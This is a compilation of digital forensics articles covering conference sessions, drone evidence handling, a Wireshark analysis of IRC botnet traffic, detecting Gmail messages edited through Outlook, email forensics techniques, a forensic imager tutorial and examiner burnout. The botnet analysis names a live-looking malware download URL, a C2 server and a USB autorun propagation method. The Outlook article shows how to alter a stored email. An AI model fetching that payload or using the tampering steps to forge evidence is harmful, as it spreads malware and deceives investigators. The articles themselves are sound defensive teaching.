Wednesday March 13th

The final day of the conference will begin with two ‘early riser’ options at 8am: Jennine Gilbeau from the US Department of Homeland Security will talk about securing the digital landscape, and another session will look at the dark web, though the speaker and details are still to be confirmed.

At 9:15am attendees will be able to discover how to use the GDPR to improve their companies’ bottom line, culture and IT practices. Jay Cooper from Sumuri will be discussing some APFS imaging considerations, while Michele Stuart from JAG Investigations will show attendees how to use OSINT and social media data to identify and locate individuals of interest. In the computer security track, Donald Malloy from OATH will be tackling the tricky topic of how to let the good guys in while keeping the bad guys out when it comes to IoT security. There will also be a Cellebrite demo happening in the Canyon room.

In the last session of the morning Passware will be in the Canyon room demonstrating their forensic solutions. Greg Scarbro from the FBI will be showing attendees the FBI’s Next Generation Identification system – this was a fascinating talk at Techno Security TX and is highly recommended! Jessica Hyde will be talking about Apple’s “tween years”, from iOS 10 through to 12.

Following lunch there will be a session about preventing common cloud migration mistakes, alongside two speakers from Whooster who will show attendees how to access unique investigative data in real time. Oxygen’s Lee Reiber will look at how to get hold of location data and put it to use in investigations, while Jeremy Kirby from Susteen will show how to acquire immediate evidence from cell phones in the field.

The final sessions of the conference will focus on examining the WhatsApp messenger on Android devices; how to use the Windows PowerShell and command prompt as investigative tools; and how to address the challenge of user privacy in cars.

To view the full conference program and register to attend, please visit the official website. Forensic Focus readers can enjoy a 30% discount on the registration price by entering the code FFOCUS19 when booking. 

If there are any talks you would specifically like us to cover, or any speakers you’d especially like to see interviewed, please leave a comment below or email scar@forensicfocus.com.

by Lee Reiber, COO, Oxygen Forensics, Inc.

The proliferation of recreational drones and their impact on digital incident response has dramatically increased during the last several years. In January 2018, Nextgov stated the U.S. Federal Aviation Administration (FAA) reported over 1 million drone operators registered with the United States government. This number continues to grow each holiday season, when new unmanned aircraft systems (UAS) are introduced to market and users hit the streets armed with drones that can fly great distances, record crystal clear video, and carry a payload.

These systems are currently regulated by the FAA, and guidelines have been given to local law enforcement on how to handle drone incidents. However, these guidelines apply only to systems that have been registered in the United States. Those that have not been registered are currently allowed to fly and will continue to fly.

Types of Investigations

UAS investigations may involve simple infractions such as flying in a restricted area like a military installation or park, as well as intentional criminal activities such as flying within no-fly zones (e.g., airports, prisons, etc.), invasion of privacy and surveillance, or delivery of controlled substances. These violations or crimes represent limited risk, but what about the delivery of a weapon of mass destruction? Once inconceivable by an over-the-counter UAS, the ability to deliver and disperse liquid containers, aerosol containers, explosive devices, or other munitions is now a reality.

Drones can now carry sufficiently large items to potentially be considered a threat

Additionally, outside the work of nefarious actors, how do we prevent unintended consequences resulting from thousands of law enforcement officers and commercial pilots operating UAS systems capable of carrying hundreds of pounds? If left unaddressed, these issues may result in massive setbacks for law enforcement, and forensic investigators must be prepared to handle the data.

First responders, investigators, and legal teams must be ready not only to combat this real threat but also to recover valuable data and identify those responsible.

At the Scene of Discovery: First Responders

When responding to an event that involves a UAS it is important to survey the device from a distance. A UAS can carry explosives or other harmful substances, and running into the scene could have disastrous results. Once the scene has been rendered safe, the first responder or investigators on scene should recover any wet evidence or package the device in such a way to preserve the device and any residual evidence.

Be sure to render the device safe at the scene

Once the device has been rendered safe, remove the battery and transport to a safe location for processing. If the device is destroyed and in pieces, it is important to look for the main body of the device that contains the motherboard with the flash chip. Also, many drones have external memory cards that are inserted into a slot connected to the motherboard. If the card is missing look in the area and recover if found. Additional devices found with the UAS like mobile phones, controllers, VR goggles, or other components should also be seized and transported to a safe location.

In the Lab: Digital Investigators

UAS systems contain valuable information that can tell an investigator where an aircraft was at the time of an event. Furthermore, information such as altitude, velocity, direction, rotor speed, battery power, XYZ axis, user email, user account, and other valuable data can be contained within controllers, mobile device apps, VR goggles, external media cards, cloud sources, and, most importantly, the aircraft itself. However, precautions must be taken.

There are several methodologies and thoughts on processing the data from the physical UAS. Much like mobile devices, the UAS receives a signal from a controller to operate. So, if you are processing the UAS while ON, then isolate the device from any available cellular, radio, Wi-Fi, or Bluetooth network. Process any removable media card physically and obtain a bit-by-bit image to recover deleted images, log files, or other files that could be of importance. Connect the device via USB and obtain a physical collection of the internal eMMC to later analyze.

An iTunes backup will generally be able to recover the required information and databases

If the device is OFF when coming into the lab, process the external media card physically and, if possible, carefully dismantle the device and first attempt a non-invasive JTAG, ISP, or other extraction technique to obtain a physical image of the internal eMMC. If this method is not viable, there is an option to remove the flash and conduct a read of the chip using a programmer (chip-off). This data can then be ingested into digital forensic tools to parse and decode valuable data. Removing the chip from the device is destructive, and should only be utilized if there are no other options.

If a mobile device was used to control the UAS the information from the app can be extracted to provide important log files, images, videos, account information, and more. With iOS devices an iTunes backup can generally recover the information and databases, while Android devices generally will need to be rooted or a physical image obtained to gather the detailed flight logs and account information.

In the Courtroom: Prosecutors

Clearly documenting the process of not only the investigation but also the seizure is critical to the prosecution. The investigation of a UAS is not a trivial matter and if details are left undocumented (e.g., ON/OFF, non-invasive/invasive, media card/no media card) the case may be in peril. Unlike like the early “wild west” years of extracting and using cellphone data in cases, a UAS digital investigation should follow exact protocols.

Documentation, standard operating procedures (SOPs), and implementation of a forensic methodology will assist in successful investigation and prosecution. Failing to have a plan will often prove fruitless and create more work during an investigation. There is no better time to acquaint your team, investigators, and legal counsel on the critical information that can be gleaned from a UAS when part of an investigation.

by Swasti Bhushan Deb

Botnets are well-known in the domains of information security, digital forensics and incident response for hosting illegal data, launching DDOS attacks, stealing information, spamming, bitcoin mining, spreading ransomware, launching brute force attacks, managing remote access to connected devices, and even propagating infection to other devices, among other things. Internet Relay Chat (IRC) networks are a popular medium for controlling bot networks. IRC-based bots with unpredictable degrees of sophistication and customized commands have something in common. An IRC bot, when executed in a client machine, connects to IRC server on random higher ports, logs into a definite predefined channel and listens for commands issued by the bot master.

The botnet lifecycle starts with the infection phase where a system is compromised by a customized and preconfigured piece of malware. The connection phase is when the infected system initiates contact on a predefined remote IRC TCP service port for communication. A nickname, password or key may authenticate the bot’s access to the channel. In the command & control phase, the bot receives commands from the bot master via the designated channel of communication (C2C). Finally in the multiplication phase, customized and preconfigured malware is downloaded into the infected bot for further control and to spread infection via USB devices, writable network shares and so on.

This article intends to showcase a proof of concept aimed to analyse unique communication to / from an infected host and botnet. The network capture used can be found here. The analysis was carried out using Wireshark. The analysis and observations will assist in initial investigation of the network capture to identify traffic illustrating typical bot behaviour – joining a predefined channel with a nickname or username; messages exchanged between the bot and the bot master; spreading infection, and so on.

Observations

1. A total of 60 packets were observed to be present in the pcap file. IP addresses identified:
   1. 192.168.45.130: port 1037 (service: ams) ;port 1038 (service: mtqp)
   2. 192.168.45.2: port 53 (service : DNS)
   3. 91.121.100.60: Resolved Address- irc.accesox.net ;TCP port 5540 (service : sdreport)
2. IP 192.168.45.130,port 1037 initiates a DNS query to 192.168.45.2, port 53 for name resolution of irc.accesox.net. DNS Response from 192.168.45.2 at 91.121.100.60 and 91.121.96.162.
3. Packets-3,4,& 5 detail TCP three way handshake. The handshake was initiated from 192.168.45.130,port 1038 & destined to irc.accesox.net (91.121.100.60,port 5540).
4. Packet 6: IRC “PASS” message was used to set a ‘connection password’ by the host bot- 192.168.45.130.This is used to register a connection with an IRC server- irc.accesox.net (91.121.100.60)
5. Packet 8:IRC “NICK” message used to provide user a nickname (pLagUe{) by host 192.168.45.130.
6. Packet 10:IRC “USER” message was used to specify the username by host 192.168.45.130. The original parameters alongside the message are in the format <username> <hostname> <servername> <realname>.The username was identified as “sKuZ” and real name as “TeaM UniX b0at 0.4”
7. Packet 12: IRC server-irc.accesox.net (91.121.100.60) replies back to host (192.168.45.130). The reply originates from server “sex.accesox.net”. Indicates authorization message by the server.
8. Packet 15: IRC server-irc.accesox.net pings the client (192.168.45.130) with a hostname as it could not resolve the hostname. The PING command was used to test the presence of the client bot.
9. Packet 16: The PONG response indicates a reply by the client bot to the ping message of the ICR Server.
10. Packet 18: Communication indicates replies from server “sex.accesox.net” which was created on “mar 25 2011 at 02:34:51 CET” and is running “Unreal3.2.9-rc1” (an open source IRC server). The IRC server welcomes the client bot with a series of additional replies. As per RFC 2812,the series of replies indicates successful registration by the client bot.
11. Packet 19: Indicates message from the client host to change visibility mode to a hidden user on the IRC server.
12. Packet 21 & 23: JOIN command issued by the client bot and request to start listening to the specific channel –“ verga”.
13. Packet 25: PRIVMSG used by the client to send private message to channel “verga”. The message “NueVo PuTo InfeCcIoN” in Spanish translates to “New WhOre InfeCtIOn” in English.
14. Packet 27: Details the command response from the IRC server. Indicates 56 users and 189 invisible on 9 servers. Informs the client host that the nickname isn’t registered.
15. Packet 30-43: Indicates re-registration initiated by the client bot.
16. Packet 45: Indicates command message from Bot “pLagUe” to download an executable “plaga.exe” hosted at http://www.freewebtown.com/redzone/ into the system drive of the client bot ( c:\jiji).
17. Packet 53:Details the response from the client bot to the IRC server indicating infecting virus into “autorun.inf” of (most likely attached) USB devices.

IRC Communication summary

Table 1 Packet wise description

• The interpretation of the IRC commands are based on RFC 2812.
• The host at 192.168.45.130 joined irc.accesox.net (91.121.100.60) with username “sKuZ” and joined channel “verga”.
  The pLagUe{USA}64007 bot instructs the client bot (192.168.45.130) to download an executable- “plaga.exe” hosted at http://www.freewebtown.com/redzone/, store it in the system drive (c:\jiji) and inject itself into “autorun.inf” of attached USB devices. This indicates the propagation mechanism used in this case.
• The executable “plaga.exe” hosted at http://www.freewebtown.com/redzone/ was flagged as a malware by VirusTotal. The VirusTotal graph indicates multiple malware instances hosted by subdomains of http://www.freewebtown.com.

From the observations cited above, it would be reasonable to conclude that the host at 192.168.45.130 made a DNS query to 192.168.45.2 for resolution of irc.accesox.net. It is assumed that the host at 192.168.45.130 could be infected with a IRC Trojan which initiated TCP connection to irc.accesox.net, logged into a predetermined IRC channel and based on the commands issued by the bot master, spread further infection by infecting the autorun.inf of the attached USB devices.

Analysis

Capture File Properties: A quick glance at the pcap file using Wireshark indicates a total of 60 packets. This can be achieved using the “Capture File Properties” window by selecting the “Capture File Properties“ option from the Statistics drop-down menu.

TCP Stream: An excerpt of the TCP stream is detailed below and indicates 19 client packets and 13 server packets. The “Follow TCP Stream” window can be used to visualize protocols in the way that the application layer sees it. This can be achieved right clicking on any TCP packet and selecting Follow =>> TCP Stream. Figure 1 describes the TCP stream and relevant information required to understand bot communication.

Figure 1 Excerpt of TCP Stream

1-Connection password set by the host bot
2-Nickname set by the host bot
3-Username set by the host bot
4-Notice from IRC server sex.accesox.net
5-PING command from IRC server & PONG response from bot
6-IRC network info
7-Visibility mode set by client bot as hidden
8-Client bot request message to start listening on specific channel – “verga”
9-Private message from client bot on channel – “verga”
10-Additional message indicating the number of active channels, local users, online operators etc. on the IRC server
11-Request message indicating a re-registration attempt of the client bot to listen on channel “verga”
12-Message from the botnet – pLagUe to download an exe (plaga.exe) from http://www.freewebtown.com/redzone/
13-Private message from client bot indicating successful injection of the exe into autorun.inf of four USB devices

“Protocol Hierarchy Statistics”: Packets usually contain multiple protocols. The “Protocol Hierarchy Statistics” window reflects a tree of all the protocols in the capture. This serves as an initial assessment in understanding major protocols present in the capture. Applying the TCP “Data” field as a display filter lists the TCP packets containing data. The protocol hierarchy chart in Wireshark can be generating by selecting the “Protocol Hierarchy“ option from the Statistics drop-down menu.

References

IETF
Wireshark

by Arman Gungor

Last week, I came across an interesting post on Forensic Focus. The poster, jahearne, was asking about how one can detect manipulation of an existing email in Gmail. In his hypothetical scenario, the bad actor was using Outlook to edit the message and change its contents after it was received. I wanted to reproduce this setup and examine the results to see what we find out.

The Setup

I started by performing a baseline acquisition of the target email account over IMAP—which is the same protocol Outlook would use to connect to Gmail. This allowed me to capture the Internal Date Message Attribute as well as the Unique Identifier (UID) Message Attribute for each message before any manipulation took place. I used our Forensic Email Collector to do this, but you can also capture these values by directly interfacing with Gmail’s IMAP server.

I then connected the Gmail account to Outlook 2016. Once Outlook finished downloading the messages, I picked the message that I wanted to manipulate. The original message looked as follows:

Original Gmail message

I then clicked the “Edit Message” menu item from the “Move” section in the toolbar ribbon for the email.

Editing Gmail message in Outlook

I changed the subject of the message from “Play games while you drive ” to “Play games while you ride your horse” and changed the string “I used to drive 4 hours a day to get to SF” to “I used to drive 4 hours a day to get to San Diego” in the message body.

I clicked the “Save” button on the top left corner. Outlook indicated that it was synchronizing the folder, and voilà! The manipulated message was pushed to the server.

I double checked this by logging into Gmail’s web interface and pulling up the manipulated message. It looked as follows:

Manipulated email in Gmail

Now that our manipulated message had made its way back to Gmail, it was a good time to acquire the mailbox one more time for comparative analysis.

Forensic Examination of Manipulated Email

Server Metadata

The first question in my mind was how this affected server-side metadata—the Internal Date and Unique Identifier message attributes. Before manipulation, our message (highlighted) and its four immediate neighbors had looked as follows:

Note that the UIDs were in ascending order while the messages were sorted chronologically by Internal Date.

Now, let’s take a look at the same set of messages after the manipulation:

As expected, the manipulation changed the cryptographic hash of the email message. But more importantly, it caused Gmail’s IMAP server to assign the message a new UID. Now, when we look at the messages in chronological order, the UID of the manipulated email is no longer in order. In fact, it received the greatest UID in the folder. Let’s take a look at the mechanism that caused this.

How Did Outlook Replace The Message on The Server?

In the background, Outlook issued an APPEND IMAP command to Gmail’s IMAP server and introduced the altered email into the mailbox as a new message. As an argument to the APPEND command, Outlook passed the Internal Date of the original message. The IMAP specification for the APPEND command states that:

If a date-time is specified, the internal date SHOULD be set in
the resulting message; otherwise, the internal date of the
resulting message is set to the current date and time by default.

In this case, because a date-time was specified, the Internal Date message attribute was preserved. Depending on the IMAP server and the email client that was used, you may find that the Internal Date message attribute sometimes reflects the time when the altered message was synced back to the mailbox.

After the APPEND command, Outlook set the “\Deleted” IMAP flag on the original message. Finally, Outlook issued a UID EXPUNGE command to permanently remove the original message from the mailbox.

Message Data and Metadata

Unlike scenarios where the suspect edits an existing message with a text editor and uploads it to the IMAP server, here I used Outlook to alter the message. Let’s take a look at how the manipulated email message in Gmail looks different than the original.

Message Size and Body

Editing the message using Outlook and saving it caused it to almost double in size. The total size of the message increased from 66.9 KB to 121 KB. This was mostly because of the formatting information Outlook inserted into the document.

The “ProgId”, “Generator”, and “Originator” meta tags were populated with the values “Word.Document”, “Microsoft Word 15”, and again “Microsoft Word 15” respectively—not unlike a Word document saved in HTML format.

Upon looking at the part where I had edited the message body, I found that Outlook managed to update both the HTML and the plain text versions of the message body consistently.

MIME Boundary Delimiters

The MIME boundary delimiter of the original message was “=-FqYpb1xnVuagRE/vpmLO”. After the edits, it was changed to “—-=_NextPart_000_0000_01D4B364.5C460060“.

Note that the last part of the new MIME boundary delimiter, 01D4B364.5C460060 (6000465C64B3D401 in reverse byte order), is a FILETIME value. Decoding the FILETIME value results in 01/23/2019 21:41:12.6780000. This is not the time when the original message was edited and saved in Outlook, but the time when the edited message was synced back to Gmail by Outlook. The timestamp has millisecond precision, and no time zone offset (thanks, Charles Platt, for spotting this!).

Header Fields

When the message was edited using Outlook, the header information shrank from 4,950 bytes to 2,184 bytes. This was mostly because Outlook stripped out several lengthy header fields such as “DKIM-Signature” and “Authentication-Results”.

The Message-Id header field was preserved.

One significant change was to the Origination Date (i.e., “Date” field in the header). The “Date” field of the original message read:

Date: Mon, 5 Nov 2018 17:43:28 +0000

After the edits in Outlook, the “Date” field of the modified email became:

Date: Mon, 5 Nov 2018 09:43:28 -0800

While both timestamps refer to the same point in time, the manipulation in Outlook caused the “Date” field to reflect the time zone where the edits were made!

The “Subject” header field also changed as expected. It was originally UTF-8 encoded to accommodate the “oncoming automobile” emoji (\xF0\x9F\x9A\x98):

Subject: =?UTF-8?Q?Play_games_while_you_drive_=F0=9F=9A=98?=

After my edits, the new Subject header field became:

Subject: Play games while you ride your horse

Outlook also added a few new header fields such as:

X-Mailer: Microsoft Outlook 16.0
X-OlkEid: 00000000E99D742F177E4948AB97502B6BAC12160700C3B68E10F77511CEB4CD00AA00BBB6E600000000000C
0000D9539C2261A6BB45B9DAB62C7081B3C10100E800000000006A8B4A45F8869849BA81A810114C7889
Thread-Index: AQGfn39hkC1I90ybIjXNvTnfAiwDDg==

Note that Outlook 16.0 matches the version of Outlook (2016) I used to edit the message.

Conclusions

This exercise shows just how easy Outlook makes it for an end user to edit an email message that’s on the server.

In this case, examining the server metadata along with the message itself made it clear that the message was manipulated. The manipulated email had, among other things:

• An out-of-order UID
• Artifacts in the message header and body that were inconsistent with other messages from the same sender
• A time zone offset in its Origination Date that was inconsistent with those of other messages from the same sender, and that matched the time zone where the message was manipulated
• Its X-Mailer header field populated with the name and version of the email client that was used to alter the message
• A new MIME boundary delimiter which contains a timestamp reflecting the time the altered message was reintroduced to Gmail

When forensically authenticating emails, it is important that forensic examiners capture not only the message of interest but also its neighbors and server metadata. Examining the suspect message in isolation prevents the examiner from analyzing valuable contextual evidence that lives on the server.

References:
RFC 5322: Internet Message Format 
RFC-3501: Internet Message Access Protocol 
RFC-2045: Multipurpose Internet Mail Extensions (MIME)
Forensic Focus Post

About The Author

Arman Gungor, CCE, is a digital forensics and eDiscovery expert and the founder of Metaspike. He has over 21 years’ computer and technology experience and has been appointed by courts as a neutral computer forensics expert as well as a neutral eDiscovery consultant.

by Chirath De Alwis

Due to the rapid spread of internet use all over the world, email has become a primary communication medium for many official activities. Not only companies, but also members of the public tend to use emails in their critical business activities such as banking, sharing official messages, and sharing confidential files. However, this communication medium has also become vulnerable to attacks. This article focuses on email architecture and existing investigation techniques used by forensic investigators.

Email Architecture

When a user sends an email to a recipient, this email does not travel directly into the recipient’s mail server. Instead it passes through several servers. The MUA is the email program that is used to compose and read the email messages at the client end [1]. There are multiple MUAs available such as Outlook express, Gmail, and Lotus Notes. MTA is the server that receives the message sent from the MUA. Once the MTA receives a message it decodes the header information to determine where the message is going, and delivers the message to the corresponding MTA on the receiving machine [1]. Every time when the MTA receives the message, it modifies the header by adding data. When the last MTA receives the message, it decodes it and sends to the receiver’s MUA, so the message can then be seen by the recipient. Therefore an email header has multiple pieces of server information, including IP addresses.

Email Identities and Data

The primary evidence in email investigations is the email header. The email header contains a considerable amount of information about the email. Email header analysis should start from bottom to top, because the bottom-most information is the information from the sender, and the top-most information is about the receiver.  In the previous section it was shown  that email travels through multiple MTAs. These details can be found in the email header. The following picture depicts a sample header.

In order to understand the header information, it is necessary to understand the structured set of fields available in the header. The following are some of the basic field names and descriptions.

Email Forensic Investigation Techniques

Email forensics refers to analyzing the source and content of emails as evidence. Investigation of email related crimes and incidents involves various approaches.

Header Analysis

Email header analysis is the primary analytical technique. This involves analyzing metadata in the email header. It is evident that analyzing headers helps to identify the majority of email-related crimes. Email spoofing, phishing, spam, scams and even internal data leakages can be identified by analyzing the header.

Server Investigation

This involves investigating copies of delivered emails and server logs. In some organizations they do provide separate email boxes for their employees by having internal mail servers. In this case, investigation involves the extraction of the entire email box related to the case and the server logs.

Network Device Investigation

In some investigations, the investigator requires the logs maintained by the network devices such as routers, firewalls and switches to investigate the source of an email message.  This is often a complex situation where the primary evidence is not percent (when the ISP or proxy does not maintain logs or lacks operation by ISP [2]).

Software Embedded Analysis

Some information about the sender of the email, attached files or documents may be included with the message by the email software used by the sender for composing the email [2]. This information may be included in the form of custom headers or in the form of MIME content as a Transport Neutral Encapsulation Format (TNEF)[2].

Sender Mail Fingerprints

The “Received” field includes tracking information generated by mail servers that have previously handled a message, in reverse order. The “X-Mailer” or “User-Agent” field helps to identify email software. Analyzing these fields helps to understand the software, and the version used by the sender.

Use of Email Trackers

In some situations, attackers use different techniques and locations to generate emails. In such situations it is important to find out the geographical location of the attacker. To get the exact location of the attacker, investigators often use email tracking software embedded into the body of an emaqil. When a recipient opens a message that has an email tracker attached, the investigator will be notified with the IP address and geographical location of the recipient. This technique is often used to identify suspects in murder or kidnapping cases, where the criminal communicates via email.

Volatile Memory Analysis

Recent research has been conducted in analyzing spoofed mails from volatile memory [3]. Since everything passes through volatile memory, it is possible to extract email related evidence (header information) from volatile memory.

Attachment Analysis

Most viruses and malware are sent through email attachments. Investigating attachments is crucial in any email-related investigation. Confidential information leakage is another important field of investigation. There are software tools available to recover email-related data, such as attachments from computer hard discs. For the analysis of suspicious attachments, investigators can upload documents into an online sandbox such as VirusTotal [4] to check whether the file is malware or not. However, it is important to bear in mind that even if a file passes a test such as VirusTotal’s, this is not a guarantee that it is fully safe. If this happens, it is a good idea to investigate the file further in a sandbox environment such as Cuckoo [5].

References

1. Guo,Hong. Jin,Bo. Qian, Wei. 2013. [Online]. Analysis of Email Header for Forensics Purpose. Available from: https://ieeexplore.ieee.org/document/6524415?fbclid=IwAR2G2rRL_55D1D9N47deGryz6AJIxmFQ7eC1HCIvei_-VgJi2DMSjHMzau8. [Accessed:02/14/2019]
2. Banday.M.T. 2011. [Online]. TECHNIQUES AND TOOLS FOR FORENSIC INVESTIGATION OF EMAIL. Available from: https://pdfs.semanticscholar.org/8625/a3b17d199e5cabbb796bad0df56a7979c77c.pdf. [Accessed:02/14/2019]
3. Iyer.R.P, et la.2017. Email spoofing detection using volatile memory forensics. [Online]. Available from: https://ieeexplore.ieee.org/document/8228692. [Accessed:02/14/2019]
4. VirusTotal. 2019. [Online]. Available from:  https://www.virustotal.com/. [Accessed:02/14/2019]
5. Cuckoosandbox. 2019. [Online]. Available from:  https://cuckoosandbox.org/. [Accessed:02/14/2019]

About The Author

Chirath De Alwis is an information security professional with more than four years’ experience in Information Security domain. He holds BEng (Hons), PGdip and eight professional certifications in cyber security and also reading for his MSc specializing in Cyber Security. Currently, Chirath is involved in vulnerability management, Threat Intelligence, incident handling and digital forensics activities in Sri Lankan cyberspace. You can contact him on chirathdealwis@gmail.com.

Welcome to Logicube’s tutorial on the optional Thunderbolt I/O card on the Forensic Falcon-NEO. In this session, we’ll show you how to install and use this card.

The optional Thunderbolt I/O card connects directly to Falcon-NEO’s source or destination I/O card ports. This card allows you to image directly to or from Thunderbolt USB C, and USB 3.1 Gen 2 external drives and enclosures. The Thunderbolt card comes with a labelled replacement door for the Falcon-NEO, along with a small screwdriver.

To install the card, first turn the Falcon-NEO over to see three port doors: two on the source side and one on the destination side. Begin by removing the door from the port where you want to insert the card. Once the door is removed, you will see a yellow and black cable which has a connector on one end. This connector should be inserted into the power port on the I/O card.

Once the cable is connected, proceed to slide the cable into the port, and slide the pin side of the card into the socket at the back of the port. You will then need to use the supplied screwdriver to screw down the two small screws on the left and right side of the card, into the post seen here.

Once the card is firmly installed, you can then proceed to slide the labelled door over the port and insert the screw to lock it in place. You will now see the Thunderbolt USB-C port connector exposed, and you’re ready to connect any Thunderbolt USB-C, USB 3.1 Gen 2, external drive or storage enclosure to the Falcon-NEO and begin imaging, wiping or hashing these drives.

Any Thunderbolt external drive or storage enclosure connected to the I/O port will show up as a source or destination, depending where you’ve installed the I/O card and connected the drive, within the Falcon-NEO GUI as seen here.

Adding the Thunderbolt 3 USB C I/O card to the Falcon-NEO ensures forensic investigators are prepared to capture evidence data from these types of devices when they are encountered in the field or in the lab. Organisations using large capacity Thunderbolt storage enclosures for evidence data collection can now take advantage of Thunderbolt 3 technology’s blazing fast transfer speeds to shorten the acquisition process.

Thank you for your interest in Logicube’s premier forensic imager, Falcon-NEO. We hope you found this tutorial informative. To learn more about the Falcon-NEO, please visit our website at http://www.logicube.com or contact our sales team at sales@logicube.com.

by Christa Miller

Quite a lot has been written over recent weeks about burnout. Not only DFIR-specific posts, first from Richard Bejtlich and then, in follow-up from Eric Huber and Brett Shavers; but also news articles including:

• Why Are Young People Pretending to Love Work? (The New York Times)
• How Millennials Became The Burnout Generation (BuzzFeed)
• 10 Ways To Buck ‘The Cult of Busy’ Habit For A Better Work Life Balance (Forbes)

Clearly, as The Guardian relates, the problem is endemic across industries, professions, and organizations. Yet burnout in the digital forensics world is unique. In addition to more typical work and life pressures, digital forensic examiners are faced with traumatic images and audio, long hours, and justice that often seems to be unevenly applied. Few other people understand the job or its stressors, and for those working counterterror investigations, operational security limits the possibility of “talk therapy” even further.

What is burnout, and how do you identify it?

In his blog, Bejtlich reflects:

Starting in late 2014 and progressing in 2015, I became less interested in security. I was aggravated every time I saw the same old topics arise in social or public media. I did not see the point of continuing to debate issues which were never solved. I was demoralized and frustrated.

The Mayo Clinic defines job burnout as “a special type of work-related stress — a state of physical or emotional exhaustion that also involves a sense of reduced accomplishment and loss of personal identity.”

Burnout isn’t, however, a medical diagnosis, so defining it beyond “work-related stress” can be tricky. In some ways, it’s similar to depression. You might:

• Lack the energy to be productive, to go to the office, or even to get out of bed on workdays.
• Have trouble concentrating, or lose interest in otherwise enjoyable activities.
• Experience changes in sleep habits or the state of your physical health.
• Use food, alcohol, or drugs to numb out — or on the flip side, to try to feel something.

On the other hand, if limited only to work — you feel you come alive on weekends and holidays, for example — it may be burnout, and not depression. The Mayo Clinic’s article lists several other burnout-specific symptoms, including cynicism or irritability in the work environment, disillusionment with your job or workplace, or lack of a sense of satisfaction in your own accomplishments.

Conversely, as described in these pieces from Forbes and Inc, you might feel the need to “prove” yourself, working harder and longer hours. You don’t enjoy it, but because you’re convinced that no one wants to sit in your dark hole with you and you’re determined to find your way out, you stick with it.

Where does burnout come from?

Burnout, like other chronic conditions, is cumulative, and multiple factors often play into it. A 2014 PoliceOne.com article describes a variety of root causes of burnout in police officers. Among others, these causes often include:

• Shift work and overtime that can isolate you from family and friends, especially if you can’t choose shifts or you have to miss holidays and family events.
• Policies or procedures that seem more bureaucratic than beneficial, making it difficult to work efficiently or effectively.
• Unsatisfying assignments, as well as lack of advancement opportunities or professional development.
• Personality conflicts or working with toxic people at any level.

Forensic examiners both in and out of law enforcement can experience these factors. Work demands can seem neverending, especially if your forensic lab is understaffed, the volume of evidence suddenly increases, you have — as Shavers recalls from his own experience — other hats to wear, or your overall environment is fast-paced with a lot of productivity demands. As Huber succinctly put it: “too many hours and too much travel.”

While many agencies have dedicated budgets and resources to developing professional digital forensics examiners, others still include forensic labs in required rotations. That means that as much as you might love digital forensics work, another investigator might regard it as an “unsatisfying assignment.”

Indeed, sometimes burnout is the result of a misalignment of individual with the company or with the role. Huber notes “the tempo and politics of giant corporations,” while Bejtlich likewise writes:

The prospect of becoming part of a Silicon Valley software company initially seemed exciting, because we would presumably have greater resources to battle intruders. Soon, however, I found myself at odds with FireEye’s culture and managerial habits, and I wondered what I was doing inside such a different company.

That isn’t to say employees of small or medium companies can’t also experience burnout. Startups, for example, demand employees who can, for all intents and purposes, juggle twelve flaming swords while balancing one-footed on a tightrope for twenty hours straight.

In the forensics world, this might mean not only performing digital forensic examinations, but also finding new business, nurturing existing clients, making presentations to local groups, dealing with finances, and other aspects of running a business. Furthermore, as a company grows and its priorities shift, employees must adapt, sometimes more rapidly than they might be comfortable with.

One final factor: the nature of the job itself. Digital forensics examiners are routinely exposed to some of the most traumatic visual and auditory content you never wanted to imagine. Those responsible for analyzing evidence of child exploitation and terrorism content can experience “secondary traumatic stress,” according to a wide range of scholarly research.

Additional stressors, writes Dan Schmidt in a research paper, come from law enforcement colleagues who don’t value digital investigations because they aren’t “hands-on” enough (ironically an argument for mandatory rotation), a lack of appropriate training, and insufficient legal and procedural guidance. Schmidt notes that another source of stress can come from having to interact with suspects online, maintaining a less-than-savory undercover identity.

The impact of employee burnout

Burnout has personal, physical consequences for individuals, according to the Mayo Clinic piece. These include heart disease, high blood pressure, Type 2 diabetes, and a suppressed immune system.

Extrapolate that out to multiple employees, however, and you have to start to consider burnout’s broader implications. Another Forbes article details the business impact of burnout. It increases a company’s healthcare spending, for one, and can contribute to employee attrition.

That, of course, affects hiring and training budgets, as well as productivity for employees who are left behind. In a tight year, if the empty position is eliminated, other employees are at risk for burnout from the increased workload.

Of course, digital forensics isn’t the kind of profession where burnout can or should be allowed to fester for very long. It’s no exaggeration to say that digital forensics work impacts justice in the most profound way. From victim rescue to determining whether a person could lose their freedom, few stakes could be higher.

That makes a burned-out examiner an even bigger risk in digital forensics than in many other professions. Disorganization, procrastination, corner-cutting, and other work-quality killers could lead to mistakes that might result in the wrong suspect walking free — or the failure to save victims.

Dealing with burnout as an employee

Digital forensics tools have, to some extent, begun to reduce examiners’ exposure to traumatic content by deploying artificial intelligence and other technology. When these tools are available, use them — but don’t rely on technology exclusively to prevent burnout.

Shavers writes:

“I have never been approached with advice or support or suggestions or offers to take some of the burden, so I quickly learned that it is up to me to recognize where my pain threshold is and to take proactive measures to not cross that burnout line. My suggestion is that you should never expect anyone to tell you that you need a vacation. You have to check yourself constantly. Consider yourself lucky if someone else tells you that you need a break. And take the advice because they may see something you don’t.”

As for how to actually deal with a case of burnout? That’s largely up to you. The PoliceOne.com article lists six ways to prevent and manage burnout. For example, play harder than you work, making time for “laughter, fun, and excitement” with outside hobbies and interests. Huber took up shooting; Bejtlich, krav maga; while Shavers noted the importance of family.

You should also surround yourself with positive people who can model good coping and problem-solving skills and make you feel good when they’re around. Work on resiliency and self-care, including diet, exercise, and sleep, and do good by volunteering with an organization outside of law enforcement and your identity.

Non-work activities are also mentioned in the New York Times piece:

Mr. Crawford changed his lifestyle after he realized it made him miserable. Now, as an entrepreneur-in-residence at 500 Start-ups, an investment firm, he tells fellow founders to seek out nonwork-related activities like reading fiction, watching movies or playing games. Somehow this comes off as radical advice. “It’s oddly eye-opening to them because they didn’t realize they saw themselves as a resource to be expended,” Mr. Crawford said.

If you’re a highly sensitive person, like marriage and family therapist Brooke Nielsen, you might need to find different strategies like the ones Nielsen outlines. These could include a regular meditation or journaling practice, a reordering of your schedule, changes to your work responsibilities, or another job — or career — entirely. Huber writes:

If you do find yourself burned out, there isn’t anything wrong with making a change and finding different pastures, but it’s best to make those changes when it’s not a response to getting the point of being burned out in the first place. One of the best hedges against this is having activities outside of professional life that help manage stress and give you an opportunity to do something meaningful outside of career life.

Bejtlich recommends talking about it, acknowledging that it’s a difficult subject to discuss. It can be nerve-wracking to approach a boss or colleagues who may not understand, especially if you’re concerned that their lack of understanding will lead you out the door altogether.

